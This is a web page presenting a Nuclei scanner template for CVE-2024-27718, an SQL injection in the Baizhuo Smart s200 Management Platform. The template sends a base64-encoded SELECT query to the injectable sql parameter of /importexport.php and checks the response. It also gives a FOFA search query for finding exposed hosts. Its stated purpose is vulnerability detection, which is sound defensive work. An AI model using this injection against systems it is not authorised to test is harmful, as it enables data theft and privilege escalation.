Skip to content

Smart s200 Management Platform v.S200 - SQL Injection

ID: CVE-2024-27718

Severity: high

Author: DhiyaneshDk

Tags: cve,cve2024,smart-s45f,sqli

SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component.

id: CVE-2024-27718
info:
name: Smart s200 Management Platform v.S200 - SQL Injection
author: DhiyaneshDk
severity: high
description: |
SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component.
reference:
- https://github.com/tldjgggg/cve/blob/main/sql.md
classification:
epss-score: 0.00043
epss-percentile: 0.0866
metadata:
verified: true
max-request: 1
fofa-query: body="Smart管理平台"
tags: cve,cve2024,smart-s45f,sqli
variables:
num: "{{rand_int(9000000, 9999999)}}"
cmd: "select+9,md5({{num}}),9"
http:
- raw:
- |
GET /importexport.php?sql={{base64(cmd)}}&type=exportexcelbysql HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{md5(num)}}"
- type: word
part: header
words:
- 'application/octet-stream'
- type: status
status:
- 200
# digest: 4a0a0047304502207871fa419ce3719944f7f5de600b660f7b0e1a195ba507e3f76448731f4a1550022100a08899d6b82103622be3be0419cce939143aa34d12ab7d9b06be8699d6ef4abd:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-27718.yaml"

View on Github